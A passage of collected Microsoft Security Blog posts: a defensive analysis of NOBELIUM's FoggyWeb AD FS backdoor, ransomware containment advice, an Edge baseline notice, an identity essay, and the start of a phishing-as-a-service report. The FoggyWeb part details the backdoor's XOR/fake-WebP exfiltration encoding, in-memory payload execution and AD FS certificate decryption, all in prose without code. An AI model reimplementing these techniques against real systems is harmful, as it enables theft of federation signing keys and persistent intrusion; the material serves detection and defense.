  • GetWebpImage() first invokes the Webp.GetFrame() method, which is responsible for compressing the output of the C2 command and copying the compressed version to a new array (0 padded to a multiple of 32 bytes). The length of the compressed data is added as the first four bytes of the new array.

To compress the data, GetFrame() invokes the Common.Compress() method, which is used to compress the data by leveraging the C# GZipStream compression class.

For demonstration purposes, assume the C2 command yields the following data (a 256-byte pseudo-randomly generated byte array).

Given the data above (that is, sample C2 command output), GetFrame() returns the following byte array.

  • Next, GetWebpImage() invokes the Webp.GetWebpHeader() method, passing in the size of the byte array returned by GetFrame() in the step above. GetWebpHeader() is responsible  for creating and returning an array containing custom RIFF WebP file magic/header bytes.

The array variable above contains the following 32-byte hardcoded RIFF/WebP header bytes.

If the size of the array passed to GetWebpHeader() (returned by GetFrame()) exceeds 8,192 bytes, the bytes at index 26 and 28 of the header bytes (initially set to 0x00) are replaced with 0x80. Otherwise, the bytes at index 26 and 28 are replaced with 0x40, as shown below.

 GetWebpHeader() then returns the custom RIFF/WebP header above to GetWebpImage().

  • Next, GetWebpImage() creates a new array by appending the custom RIFF/WebP header bytes returned by GetWebpHeader() to the array returned by GetFrame() (the array containing the compressed version of the C2 command output).


GetWebpImage() calls the Common.ProtectData() method of the backdoor to encode the portion of the new array that contains the compressed bytes (that is, it does not encode the custom RIFF/WebP header). As the second argument, GetWebpImage() passes the offset of the first compressed byte to ProtectData() (as shown in the table above, 0x20 or 32 is the offset of the first compressed byte in this case). ProtectData() uses a dynamic XOR key and a custom XOR methodology to XOR encode the compressed data.


Initially, the 12-byte hardcoded XOR key array contains the following (seed) bytes.

As shown in the screenshot above, each byte of compressed data is XOR’d with a byte from the XOR key array. The first byte of the compressed data (0x17) is XOR’d with the XOR key byte located at offset 8 of the key array (0x77).

After XOR’ing the first byte of the compressed data with the XOR key byte located at offset 8 of the key array, the XOR key byte itself gets overwritten with a new value.

For example, the XOR key byte located at offset 8 of the XOR key array (0x77) gets overwritten with 0xEE via the following operations.

The second byte of the compressed data (0x01) is XOR’d with the XOR key byte located at offset 9 of the key array (33 % 12 = 9) and so on until the key rolls to the first byte of the XOR array (as mentioned above, the XOR key bytes get overwritten after each encoding operation). Below is the XOR encoded version of the sample compressed array.

After the steps outlined above, GetWebpImage() returns the following sample data to the method that invokes it to obfuscate and conceal the output of each C2 command (ProcessGetRequest()).

As previously mentioned, ProcessGetRequest() returns the fake RIFF/WebP file generated above (containing stolen token-signing certificate, token encryption certificate, or the AD FS service configuration data) to the C2 in an HTTP 200 response.

If the backdoor cannot execute a C2 command successfully, it returns an HTTP 404 response to the C2 instead.

HTTP POST handler

Incoming HTTP POST requests that match the URI pattern /adfs/services/trust/2005/samlmixed/upload are handled by the ProcessPostRequest() method.

This method ensures that the ContentType value of an incoming HTTP POST request ends with “xml” (case-insensitive), and the HTTP POST data contains two XML elements named X509Certificate and SignatureValue (for example, a blob that starts with the string “<X509Certificate>” and ends with the string </X509Certificate>”).

If the XML data contains the two elements, the backdoor performs the following actions:

  • Decode the values of the SignatureValue and X509Certificate elements by first decoding the values using Base64 and then calling the Common.UprotectData() method on each decoded value.

The UprotectData() method treats the first two bytes of the Base64 decoded value as a two-byte XOR key. It invokes the Common.ProtectData() method (covered in the previous section) on the rest of the data (that is, third byte on) and then uses the two-byte XOR key to XOR decode the data returned by Common.ProtectData(). In other words, UprotectData() leverages Common.ProtectData() to remove the first layer of XOR encoding and then another XOR routine to remove the second layer of XOR encoding applied to the data.

  • Invoke the Service.ExecuteAssembly() method to handle the decoded SignatureValue and X509Certificate values. As shown below, the decoded X509Certificate value is the first GZip decompressed/inflated by calling the Common.Decompress() method.

In a new thread, Service.ExecuteAssembly() calls Service.ExecuteAssemblyRoutine() method to handle the data.

  • ExecuteAssemblyRoutine() checks if the decoded X509Certificate value starts with “MZ” (or the bytes 0x4D 0x5A, the hexadecimal representation of the decimal numbers 77 and 90, as seen in the screenshot below).

  • If the decoded X509Certificate value starts with “MZ,” the backdoor treats the decoded data as a .NET-based assembly/payload and proceeds to call its Service.ExecuteBinary() method to load and execute the DLL payload in memory. After loading the DLL in memory, ExecuteBinary() proceeds to invoke a specific method from the loaded DLL. The method name and parameters needed to invoke the method are supplied to the backdoor within the decoded SignatureValue data.

If the decoded X509Certificate value does not start with MZ, the backdoor treats the decoded X509Certificate value as source code for a C#-based payload and calls its Service.ExecuteSource() method to dynamically compile and execute the payload in memory.

After handling the HTTP POST request containing the XML elements X509Certificate and SignatureValue, the backdoor responds to the request with an HTTP 204 response code. If the HTTP POST does not have the elements mentioned above, the backdoor responds to the request with an HTTP 404 response code.

Appendix: Obtaining and decrypting AD FS tokens

As the name suggests, the Service.GetCertificate() method is responsible for retrieving an AD FS certificate (either the token- signing or the token encryption certificate, depending on the value of the certificateType parameter passed to the method) from the AD FS service configuration database.

The method performs the following actions to retrieve the desired certificate:

  • Invoke another one of its methods named GetServiceSettingsDataProvider() to create an instance of type Microsoft.IdentityServer.PolicyModel.Configuration.ServiceSettingsDataProvider from the already loaded assembly Microsoft.IdentityServer.

  • Invoke the GetServiceSettings() member/method of the above ServiceSettingsDataProvider instance to obtain the AD FS service configuration settings.

  • Obtain the value of the AD FS service settings (from the SecurityTokenService property), extract the value of the EncryptedPfx blob from the service settings, and decode the blob using Base64.

Invoke another method named GetAssemblyByName() to enumerate all loaded assemblies by name and locate the already loaded assembly Microsoft.IdentityServer.Service. This method retrieves the value of two fields named _state and _certificateProtector from an object of type Microsoft.IdentityServer.Service.Configuration.AdministrationServiceState (from the Microsoft.IdentityServer.Service assembly).

The AdministrationServiceState class/object contains configuration information necessary for the execution and handling of client requests. The field _state is used to maintain the current state of the AdministrationServiceState class/object (screenshot from Microsoft.IdentityServer.Service.dll).

The AdministrationServiceState object (stored in the _state field) contains another field named _certificateProtector.

The field _certificateProtector stores an instance of the Data Protector class DkmDataProtector for Distributed Key Management (DKM). The DkmDataProtector class implements a method named Unprotect(), which ultimately calls the Unprotect() method of DKM/IDKM (screenshot from Microsoft.IdentityServer.dll).

The DKM Unprotect() method inherits a method named Unprotect() from Microsoft.IdentityServer.Dkm.DKMBase (screenshot from Microsoft.IdentityServer.Dkm.dll).

The Unprotect() method from Microsoft.IdentityServer.Dkm.DKMBase (shown above) provides the functionality to decrypt the encrypted certificate (a PKCS12 object) stored in the EncryptedPfx blob.

Armed with the knowledge about the availability of the Unprotect() method accessible via the _certificateProtector field, the backdoor invokes the Unprotect() method to decrypt the encrypted certificate stored in the EncryptedPfx blob of the desired certificate type (either the AD FS token signing or encryption certificate).

A variant of the technique described in this Appendix was publicly presented by Douglas Bienstock and Austin Baker at the TROOPERS conference in 2019 (I am AD FS and so can you: Attacking Active Directory Federated Services). However, the method used by FoggyWeb differs from the publicly presented method, in that FoggyWeb leverages the _state and _certificateProtector fields from the AdministrationServiceState class/object to facilitate access to the Data Protector class DkmDataProtector (used to gain access to and invoke the Unprotect() method).

Indicators of compromise (IOCs)

Type Threat Name Threat Type Indicator
MD5 FoggyWeb Loader 5d5a1b4fafaf0451151d552d8eeb73ec
SHA-1 FoggyWeb Loader c896ece073dd01191cbc1d462bc2f47161828a83
SHA-256 FoggyWeb Loader 231b5517b583de102cde59630c3bf938155d17037162f663874e4662af2481b1
MD5 FoggyWeb Backdoor (encrypted) 9ff9401315d0f7258a9fcde0cfdef02b
SHA-1 FoggyWeb Backdoor (encrypted) 4597431f26424cb814c917168fa8d74d01ab7cd1
SHA-256 FoggyWeb Backdoor (encrypted) da0be762bb785085d36aec80ef1697e25fb15414514768b3bcaf798dd9c9b169
MD5 FoggyWeb Backdoor (decrypted) e9671d294ce41fe6dbb9637dc0157a88
SHA-1 FoggyWeb Backdoor (decrypted) 85cfeccbb48fd9f498d24711c66e458e0a80cc90
SHA-256 FoggyWeb Backdoor (decrypted) 568392bd815de9b677788addfc4fa4b0a5847464b9208d2093a8623bbecd81e6


Customers should review their AD FS Server configuration and implement changes to secure these systems from attacks:

We strongly recommend for organizations to harden and secure AD FS deployments through the following best practices:

  • Ensure only Active Directory Admins and AD FS Admins have admin rights to the AD FS system.
  • Reduce local Administrators’ group membership on all AD FS servers.
  • Require all cloud admins to use multi-factor authentication (MFA).
  • Ensure minimal administration capability via agents.
  • Limit on-network access via host firewall.
  • Ensure AD FS Admins use Admin Workstations to protect their credentials.
  • Place AD FS server computer objects in a top-level OU that doesn’t also host other servers.
  • Ensure that all GPOs that apply to AD FS servers apply only to them and not to any other servers. This limits potential privilege escalation through GPO modification.
  • Ensure that the installed certificates are protected against theft. Don’t store these on a share on the network and set a calendar reminder to ensure they get renewed before expiring (expired certificate breaks federation auth). Additionally, we recommend protecting signing keys or certificates in a hardware security module (HSM) attached to AD FS.
  • Set logging to the highest level and send the AD FS (and security) logs to a SIEM to correlate with AD authentication as well as Azure AD (or similar).
  • Remove unnecessary protocols and Windows features.
  • Use a long (>25 characters) and complex password for the AD FS service account. We recommend using a Group Managed Service Account (gMSA) as the service account, as it removes the need for managing the service account password over time by managing it automatically.
  • Update to the latest AD FS version for security and logging improvements (as always, test first).
  • When federated with Azure AD follow the best practices for securing and monitoring the AD FS trust with Azure AD.


Protecting AD FS servers is key to mitigating NOBELIUM attacks. Detecting and blocking malware, attacker activity, and other malicious artifacts on AD FS servers can break critical steps in known NOBELIUM attack chains. Microsoft Defender Antivirus detects the new NOBELIUM components discussed in this blog as the following malware:

  • Loader: Trojan:Win32/FoggyWeb.A!dha
  • Backdoor: Trojan:MSIL/FoggyWeb.A!dha

Microsoft 365 Defender

Endpoint detection and response (EDR) capabilities in Microsoft Defender for Endpoint detect malicious behavior related to this malware which is surfaced as alerts with the following titles:

  • A suspicious DLL was loaded by the ADFS service
  • Suspicious service launched
  • Suspicious file dropped

Azure AD Identity Protection

This kind of attack can also be detected in the cloud using Azure AD Identity Protection. It is recommended that you monitor the Azure AD Identity Protection Risk detections report for the “Token Issuer Anomaly” detection. This detection looks for anomalies in the SAML token presented to the Azure AD tenant.

Advanced hunting queries

Microsoft Defender for Endpoint

To locate related activity, run the following advanced hunting queries in Microsoft 365 Defender:

| where FolderPath has @"C:\Windows\ADFS"
| where FileName has @"version.dll"

Azure Sentinel

Azure Sentinel customers can use the following detection queries to look for this activity:

Detection query:

Indicator file:


The post FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

A guide to combatting human-operated ransomware: Part 2

September 27th, 2021 No comments

This blog is part two of a two-part series focused on how Microsoft DART helps customers with human-operated ransomware. For more guidance on human-operated ransomware and how to defend against these extortion-based attacks, refer to our human-operated ransomware docs page.

In part one of this blog series, we described the process and execution used in our customer engagements to provide perspective on the unique issues and challenges regarding human-operated ransomware. We also explained how Microsoft’s Detection and Response Team (DART) leverages Microsoft solutions to help combat this threat. In this post, we will tackle the risks of human-operated ransomware and detail DART’s security recommendations for tactical containment actions and post-incident activities in the event of an attack.

Understanding the risks of human-operated ransomware

Beyond the immediate threat of file encryption, there are several additional risks associated with human-operated ransomware events, some of which may be observed well after an investigation and the removal of the threat from the network. These risks include:

1. Disruption of business operations

Immediate actions need to be taken to reduce the blast radius of a ransomware event. In these cases, disabling portions of the network may feel like a self-inflicted denial of service, but they are necessary to counter the ransomware spread. The resulting business disruption may become public. If any affected systems are public-facing, it may require crisis communications.

2. Data theft

Most attackers are highly motivated to monetize their access to your network. In several cases investigated by DART, an attacker has performed reconnaissance for sensitive files (like contracts, financial documents, and internal communications), copied this data, and exfiltrated it before any ransomware was dropped. Taking this information before ransomware is deployed allows the attacker to have data to sell, leak, or simply show as proof that the attacker has had access to sensitive files.

3. Extortion

Data theft by ransomware operators opens an organization to extortion. It is not uncommon for threat actors to demand payment to prevent the leak of stolen data. These threats are typically sent via email with sample stolen documents attached as proof of possession. In some cases where DART has observed this activity, a threat actor accessed a cloud-based email account that was not protected by multifactor authentication (MFA) and sent threatening emails to the board of directors. The threat of extortion is still high, even when the threat actors are unsuccessful at deploying ransomware.

At DART, we often get asked, “Can you tell us which data was stolen?” To prove this requires concrete evidence, which would be either:

  • A network capture that shows the actual data leaving the network (which rarely exists).


  • Finding the data outside the organization’s network, typically on a public file-sharing site. A log file showing ‘x’ bytes were transferred does not prove what data was stolen, and a command line history or event log showing a file archiving utility was run does not prove that data was stolen.

4. Follow-on attacks

To further their monetization efforts, attackers are also often observed deploying coin miners in compromised networks. This is a low-effort method to generate additional income from a victim organization when data theft or extortion are insufficient for the attacker. Depending on the attacker’s motivation, additional malware may be deployed that would allow other criminals to gain access to the environment. This access is monetized, and the sale of compromised network access is common in most human-operated ransomware cases, performed after the primary attacker has obtained what they initially sought.

5. Reputational damage

The risk of brand damage reputation is difficult to assess in the aftermath of a human-operated ransomware event. The reputation of an organization’s brand may include lost customer and shareholder trust and loyalty, as well as current and future business. The risk of brand damage reputation is difficult to assess in the aftermath of a human-operated ransomware event. Reputational damage may be more costly and require longer-term solutions than the response to the human-operated ransomware event.

6. Compliance and regulatory reporting

Potential reporting requirements are another organizational risk depending on the industry or affiliation. This may include compliance or regulatory reporting in cases where sensitive financial information or personally identifiable information (PII) is stolen. Fines and loss of accreditation may further damage an organization’s reputation.

Recommendations and best practices


Containment can only happen once we determine what needs to be contained. In the case of ransomware, the adversary’s goal is to obtain credentials that allow administrative control over a highly available server and then deploy the ransomware. In some cases, the threat actor identifies sensitive data and exfiltrates it to a location they control.

Tactical recovery will be unique for each customer and tailored to the customer’s environment, industry, and level of IT expertise and experience. The steps outlined below are recommended for short-term and tactical containment steps your organization can take. To learn more about securing privileged access for long-term guidance, visit our securing privileged access docs page. For a comprehensive view of ransomware and extortion and how to protect your organization, you can refer to our human-operated ransomware docs page.

Graphic outlines DART’s containment steps, which cover assessing the scope of the situation and preserving existing systems.

Figure 1. Containment steps that can be done concurrently as new vectors are discovered.

After the first step of containment (assessing the scope of the situation), the second step is to preserve existing systems:

  • Disable all privileged user accounts except for a few accounts used by your admins to assist in resetting the integrity of your Microsoft Azure Active Directory (Azure AD) infrastructure. If a user account is believed to be compromised, disable it immediately.
  • Isolate compromised systems from the network, but do not shut them off.
  • Isolate at least one known good domain controller in every domain—two is even better. Either disconnect them from the network or shut them down entirely. The object here is to stop the spread of ransomware to critical systems—identity being among the most vulnerable. If all your domain controllers are virtual, ensure that the virtualization platform’s system and data drives are backed to offline external media (not connected to the network) in case the virtualization platform itself is compromised.
  • Isolate critical known good application servers (for example SAP, configuration management database (CMDB), billing, and accounting systems).

These two steps can be done concurrently as new vectors are discovered. Disable those vectors and then try to find a known good system to isolate from the network.

Other tactical containment actions can be accomplished:

  • Reset the krbtgt password, twice in rapid succession. Consider using a scripted, repeatable process. This script enables you to reset the krbtgt account password and related keys while minimizing the likelihood of Kerberos authentication issues being caused by the operation. To minimize potential issues, the krbtgt lifetime can be reduced one or more times prior to the first password reset so that the two resets are done relatively quickly. NOTE: All domain controllers that you plan to keep in your environment must be online.
  • Deploy a Group Policy to the entire domain(s) that prevents privileged log on (Domain Admins) to anything but Domain Controllers and privileged administrative-only workstations (if any).
  • Install all missing security updates for operating systems and applications. Every missing update is a potential threat vector that adversaries can quickly identify and exploit. Microsoft Defender for Endpoint’s Threat and Vulnerability Management provides an easy way to see exactly what is missing—as well as the potential impact of the missing updates.
  • Check that every external facing application, including VPN access, is protected by multifactor authentication, preferably using an authentication application that is running on a secured device.
  • For devices not using Defender for Endpoint as their primary antivirus software, run a full scan with Microsoft Safety Scanner on isolated “known good” systems before reconnecting them to the network.
  • For any legacy operating systems, upgrade to a supported OS or decommission these devices. If these options are not available, take every possible measure to isolate these devices, including network/VLAN isolation, IPsec rules, and log on restrictions, so they are only accessible to the applications by the users/devices to provide business continuity.

DART sometimes finds customers who are running mission critical systems on legacy operating systems (some as old as Windows NT 4) and applications, all on legacy hardware. This is one of the riskiest configurations possible—not only are these operating systems and applications insecure, if that hardware fails, backups typically cannot be restored on modern hardware. Unless replacement legacy hardware is available, these applications will cease to function.

Post-incident activities

DART recommends implementing the following security recommendations and best practices after each incident.

  • Ensure that best practices are in place for email and collaboration solutions to make it more difficult for attackers to abuse them while allowing internal users to access external content easily and safely.
  • Follow Zero Trust security best practices for remote access solutions to internal organizational resources.
  • Starting with critical impact administrators, follow best practices for account security including using passwordless or MFA.
  • Implement a comprehensive strategy to reduce the risk of privileged access compromise.
    • For cloud and forest/domain administrative access, see below for an overview of Microsoft’s privileged access model (PAM).
    • For endpoint administrative management, see below for details on the local administrative password solution (LAPS).
  • Implement data protection to block ransomware techniques and to confirm rapid and reliable recovery from an attack.
  • Review your critical systems. Check for protection and backups against deliberate attacker erasure/encryption. It’s important that these backups are periodically tested and validated.
  • Ensure rapid detection and remediation of common attacks on endpoint, email, and identity.
  • Actively discover and continuously improve the security posture of your environment.
  • Update organizational processes to manage major ransomware events and streamline outsourcing to avoid friction.

Privileged access model (PAM)

Using the privileged access model (formerly known as the tiered administration model) enhances Azure AD’s security posture. This involves:

  • Breaking out administrative accounts in a “Planed” environment—one account for each level, usually four:
    • Control Plane (formerly Tier 0): Administration of Domain Controllers and other crucial identity services (like Active Directory Federation Service (ADFS) or Azure AD Connect). This also includes applications that require administrative permissions to Azure AD, such as Exchange Server.
    • The next two Planes were formerly Tier 1:
      • Management Plane: Asset management, monitoring, and security.
      • Data/Workload Plane: Applications and application servers.
    • The next two Planes were formerly Tier 2:
      • User Access: Access rights for users (such as accounts).
      • App Access: Access rights for applications.
  • Each one of these Planes will have a separate administrative workstation for each Plane and will only have access to systems in that Plane. Other accounts from other Planes will be denied access to workstations and servers in the other Planes through user rights assignments set to those machines.
  • The net result of the PAM is that:
    • A compromised user account will only have access to the Plane it is a part of.
    • More sensitive user accounts will not be logging into workstations and servers with a lower Plane’s security level, thereby reducing lateral movement.

Local Administrative Password Solution (LAPS)

By default, Microsoft Windows and Azure AD have no centralized management of local administrative accounts on workstations and member servers. This usually results in a common password that is given for all these local accounts, or at the very least in groups of machines. This enables would-be attackers to compromise one local administrator account, and then use that account to gain access to other workstations or servers in the organization.

Microsoft’s Local Administrator Password Solution (LAPS) mitigates this by using a Group Policy client-side extension that changes the local administrative password at regular intervals on workstations and servers according to the policy set. Each of these passwords are different and stored as an attribute in the Azure AD computer object. This attribute can be retrieved from a simple client application, depending on the permissions assigned to that attribute.

LAPS requires the Azure AD schema to be extended to allow for the additional attribute, the LAPS Group Policy templates to be installed, and a small client-side extension to be installed on every workstation and member server to provide the client-side functionality.

Download LAPS from the official Microsoft Download Center.

Harden your environment

Each ransomware case is different and there is no one-size-fits-all approach. But there are things you can do now to harden your environment and prepare for a worst-case scenario. Although, these changes may impact how your organization currently works, consider the risk of not implementing them now versus dealing with a potential human-operated ransomware event. An organization that has fallen victim to a ransomware attack should keep the crucial human element in mind—real people are responding to the incident at the end of the day.

Learn more

Want to learn more about DART? Read our past blog posts.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post A guide to combatting human-operated ransomware: Part 2 appeared first on Microsoft Security Blog.

Security baseline for Microsoft Edge v94

September 27th, 2021 No comments

We are pleased to announce the enterprise-ready release of the security baseline for Microsoft Edge version 94!


We have reviewed the new settings in Microsoft Edge version 94 and determined that there are no additional security settings that require enforcement. The Microsoft Edge version 93 package continues to be our recommended baseline. That baseline package can be downloaded from the Microsoft Security Compliance Toolkit.


Microsoft Edge version 94 introduced 3 new computer settings, 3 new user settings. We have attached a spreadsheet listing the new settings to make it easier for you to find them.


In case you missed the announcement, Microsoft Edge has moved to a new release cadence.  Additional details can be found in this blog.


As a reminder, all available settings for Microsoft Edge are documented here, and all available settings for Microsoft Edge Update are documented here.


Please continue to give us feedback through the Security Baselines Discussion site or this post.

Categories: Uncategorized Tags:

3 trends shaping identity as the center of modern security

September 21st, 2021 No comments

I recently returned from Kenya, where I visited our Microsoft Nairobi development center. Like many of you, I’ve mostly worked from home for the past year and more, so it was refreshing to meet members of our global team and inspiring to feel their passion for our mission: delivering identity solutions that secure access to everything for everyone.

This mission has never been more important, given that identity has become the focal point of our digital society. Identity enabled us to rapidly shift to remote models when the pandemic first hit, and identity will help sustain the trend toward more permanent remote and hybrid models moving forward. But other emerging trends will also have a major impact on our digital society. Our team at Microsoft, as well as the identity community at large, is working hard to make sure you have the tools and technologies you need to navigate them safely and securely.

1. Cybercrime has become cyberwarfare

The sophistication and pervasiveness of cyberattacks have culminated in a moment of reckoning for our industry. Attacks from nation-states and global syndicates are on the rise, putting our economies and our very lives at risk as they target critical infrastructure. These attacks are methodically organized and exploit multiple vulnerabilities to gain access to trusted technologies and valuable data.

A Zero Trust security approach with identity as its foundation is the only way to survive this onslaught. Many of you have already started adopting Zero Trust principles, but blocking advanced, ever-evolving attack vectors requires applying these principles across your entire digital estate. It’s on the security ecosystem, including the identity community, to ensure that our services share signals and interoperate well with your entire infrastructure to enable an end-to-end Zero Trust strategy, with identity as a cohesive security control plane.

2. Multi-cloud is the new normal

As the cyber battle has escalated, so too has the complexity of your infrastructure. On-premises has given way to hybrid, then cloud-first, and now multi-cloud as a new normal. Cloud-based tools have enabled unprecedented automation and scale, as well as the exponential growth of non-human identities—but not without risk. A one-line automated script can topple your infrastructure in milliseconds. Machine objects and scripts can now elevate access privileges to complete administrative tasks, but if compromised, they can be misused.

Since each non-human entity has its own identity, access management becomes a key factor for protecting complex multi-cloud environments. We need services that ensure automation is trustworthy, easily managed, and fully visible so we can assess and control risk. To meet this challenge, the discipline of Cloud Infrastructure Entitlement Management (CIEM) has emerged to help manage the lifecycle and governance of multi-cloud environments. Microsoft has embraced this new category by acquiring CloudKnox.

3. Ubiquitous, decentralized computing requires a new trust fabric

As identity steps up to solve new challenges in an evolving security landscape, the core model for identity itself will become decentralized. This shift is part of a larger evolution to ubiquitous decentralized computing, where datacenters serve as the intelligent cloud facilitating interaction with smart devices and services on the intelligent edge. A decentralized identity model is the only way to achieve the speed required to authorize so many services and things at scale.

The independent nature of a decentralized model makes identity portable. When individuals can take their identities (and the personal information attached to them) with them wherever they conduct digital transactions, they gain more control over their privacy while benefiting from faster and more trustworthy transactions. This will change the world for so many industries, including finance, retail, healthcare, and others. Just a few years into this journey, proofs of concept have already accelerated demand for more convenient, secure, and private ways to interact at work, at home, and at play.

Looking forward

This is our commitment to you: the identity community will continue to collaborate closely in the coming years to help organizations everywhere stay ahead of these trends, which are daunting but exciting.

I recently shared my thoughts on these trends and ideas on practical steps our community can take to continue progress on this monumental undertaking at the 2021 European Identity and Cloud Conference. Please watch my session Identity’s evolving role in cloud security to learn more.

To learn more about Microsoft identity solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post 3 trends shaping identity as the center of modern security appeared first on Microsoft Security Blog.

Catching the big fish: Analyzing a large-scale phishing-as-a-service operation

September 21st, 2021 No comments

In researching phishing attacks, we came across a campaign that used a rather high volume of newly created and unique subdomains—over 300,000 in a single run. This investigation led us down a rabbit hole as we unearthed one of the operations that enabled the campaign: a large-scale phishing-as-a-service operation called BulletProofLink, which sells phishing kits, email templates, hosting, and automated services at a relatively low cost.

With over 100 available phishing templates that mimic known brands and services, the BulletProofLink operation is responsible for many of the phishing campaigns that impact enterprises today. BulletProofLink (also referred to as BulletProftLink or Anthrax by its operators in various websites, ads, and other promotional materials) is used by multiple attacker groups in either one-off or monthly subscription-based business models, creating a steady revenue stream for its operators.

This comprehensive research into BulletProofLink sheds a light on phishing-as-a-service operations. In this blog, we expose how effortless it can be for attackers to purchase phishing campaigns and deploy them at scale. We also demonstrate how phishing-as-a-service operations drive the proliferation of phishing techniques like “double theft”, a method in which stolen credentials are sent to both the phishing-as-a-service operator as well as their customers, resulting in monetization on several fronts.

Insights into phishing-as-a-service operations, their infrastructure, and their evolution inform protections against phishing campaigns. The knowledge we gained during this investigation ensures that Microsoft Defender for Office 365 protects customers from the campaigns that the BulletProofLink operation enables. As part of our commitment to improve protection for all, we are sharing these findings so the broader community can build on them and use them to enhance email filtering rules as well as threat detection technologies like sandboxes to better catch these threats.

Understanding phishing kits and phishing-as-a-service (PhaaS)

The persistent onslaught of email-based threats continues to pose a challenge for network defenders because of improvements in how phishing attacks are crafted and distributed. Modern phishing attacks are typically facilitated by a large economy of email and false sign-in templates, code, and other assets. While it was once necessary for attackers to individually build phishing emails and brand-impersonating websites, the phishing landscape has evolved its own service-based economy. Attackers who aim to facilitate phishing attacks may purchase resources and infrastructure from other attacker groups including:

  • Phish kits: Refers to kits that are sold on a one-time sale basis from phishing kit sellers and resellers. These are packaged files, usually a ZIP file, that come with ready-to-use email phishing templates designed to evade detection and are often accompanied by a portal with which to access them. Phish kits allow customers to set up the websites and purchase the domain names. Alternatives to phishing site templates or kits also include templates for the emails themselves, which customers can customize and configure for delivery. One example of a known phish kit is the MIRCBOOT phish kit.
  • Phishing-as-a-service: Similar to ransomware-as-a-service (RaaS), phishing-as-a-service follows the software-as-a-service model, which requires attackers to pay an operator to wholly develop and deploy large portions or complete phishing campaigns from false sign-in page development, website hosting, and credential parsing and redistribution. BulletProofLink is an example of a phishing-as-a-service (PhaaS) operation.

Table showing differences between phishing kits and phishing-as-a-service

Figure 1. Feature comparison between phishing kits and phishing-as-a-service

It’s worth noting that some PhaaS groups may offer the whole deal—from template creation, hosting, and overall orchestration, making it an enticing business model for their clientele. Many phishing service providers offer a hosted scam page solution they call “FUD” Links or “Fully undetected” links, a marketing term used by these operators to try and provide assurance that the links are viable until users click them. These phishing service providers host the links and pages and attackers who pay for these services simply receive the stolen credentials later on. Unlike in certain ransomware operations, attackers do not gain access to devices directly and instead simply receive untested stolen credentials.

Breaking down BulletProofLink services

To understand how PhaaS works in detail, we dug deep into the templates, services, and pricing structure offered by the BulletProofLink operators. According to the group’s About Us web page, the BulletProofLink PhaaS group has been active since 2018 and proudly boasts of their unique services for every “dedicated spammer”.

Screenshot of About Us page on the BulletProofLink website

Figure 2. The BulletProofLink’s ‘About Us’ page provides potential customers an overview of their services.

The operators maintain multiple sites under their aliases, BulletProftLink, BulletProofLink, and Anthrax, including YouTube and Vimeo pages with instructional advertisements as well as promotional materials on forums and other sites. In many of these cases, and in ICQ chat logs posted by the operator, customers refer to the group as the aliases interchangeably.

Screenshot of video tutorials posted by BulletProofLink

Figure 3. Video tutorials posted by the Anthrax Linkers (aka BulletProofLink)

BulletProofLink registration and sign-in pages

BulletProofLink additionally hosts multiple sites, including an online store where they allow their customers to register, sign in, and advertise their hosted service for monthly subscriptions.

Over the course of monitoring this operation, their online store had undergone multiple revisions. The source code for the site’s pages contained references to artifacts elsewhere on the site, which included ICQ chat messages and advertisements. While those references are still present in newer versions, the sign-in page for the monthly subscription site no longer contains service pricing information. In previous versions, the sites alluded to the cost for the operator to host FUD links and return credentials to the purchasing party.

Screenshot of BulletProofLink registration page

Figure 4. BulletProofLink registration page

Just like any other service, the group even boasts of a 10% welcome discount on customers’ orders when they subscribe to their newsletter.

Screenshot of 10% discount offered to those who will sign up for newsletter

Figure 5. BulletProofLink welcome promotion for site visitors’ first order

Credential phishing templates

BulletProofLink operators offer over 100 templates and operate with a highly flexible business model. This business model allows customers to buy the pages and “ship” the emails themselves and control the entire flow of password collection by registering their own landing pages or make full use of the service by using the BulletProofLink’s hosted links as the final site where potential victims key in their credentials.

The templates are designed to evade detection while successfully phishing for credentials, but may vary based on the individual purchasing party. Likewise, the wide variety of templates offered does not guarantee that all BulletProofLink facilitated campaigns will look identical. Instead, the campaigns themselves can be identified with a mixture of phishing page source code, combined with the PHP password processing sites referenced therein, as well as the hosting infrastructure used in their larger-scale campaigns. These password-processing domains correlate back to the operator through hosting, registration, email, and other metadata similarities during domain registration.

The templates offered are related to the phishing pages themselves, so the emails that service them may seem highly disparate and handled by multiple operators.

Services offered: Customer hosting and support

The phishing operators list an array of services on their site along with the corresponding fees. As OSINT Fans noted in their blog, the monthly service costs as much as $800, while other services cost about $50 dollars for a one-time hosting link. We also found that Bitcoin is a common payment method accepted on the BulletProofLink site.

In addition to communicating with customers on site accounts, the operators display various methods of interacting with them, which include Skype, ICQ, forums, and chat rooms. Like a true software business dedicated to their customers, the operators provide customer support services for new and existing customers.

Screenshot of phishing templates being sold by BulletProofLink

Figure 6. Screenshot of the BulletProofLink site, which offers a wide array of phishing services impersonating various legitimate services

Screenshot of BulletProofLink website showing DocuSign services

Figure 7. DocuSign scam page service listed on the BulletProofLink site

The hosting service includes a weekly log shipment to purchasing parties, usually sent manually over ICQ or email. Analysis of individual activity on password-processing replies from the collected infrastructure indicates that the credentials are received on the initial template page and then sent to password-processing sites owned by the operator.

Screenshot of a BulletProofLink ad

Figure 8. An advertisement from BulletProofLink that showcases their weekly log shipment

At the time of this report, BulletProofLink continues to operate active phishing campaigns, with large volumes of redirections to their password-processing links from legitimate web hosting providers. In the next section, we describe on such campaign.

Tracking a BulletProofLink-enabled campaign

As mentioned, we uncovered BulletProofLink while investigating a phishing campaign that used the BulletProofLink phishing kit on either on attacker-controlled sites or sites provided by BulletProofLink as part of their service. The campaign itself was notable for its use of 300,000 subdomains, but our analysis exposed one of many implementations of the BulletProofLink phishing kit:

Diagram showing BulletProofLink-enabled attack chain

Figure 9. End-to-end attack chain of BulletProofLink-enabled phishing campaigns

An interesting aspect of the campaign that drew our attention was its use of a technique we call “infinite subdomain abuse”, which happens when attackers compromise a website’s DNS or when a compromised site is configured with a DNS that allows wildcard subdomains. “Infinite subdomains” allow attackers to use a unique URL for each recipient while only having to purchase or compromise one domain for weeks on end. It is gaining popularity among attackers for the following reasons:

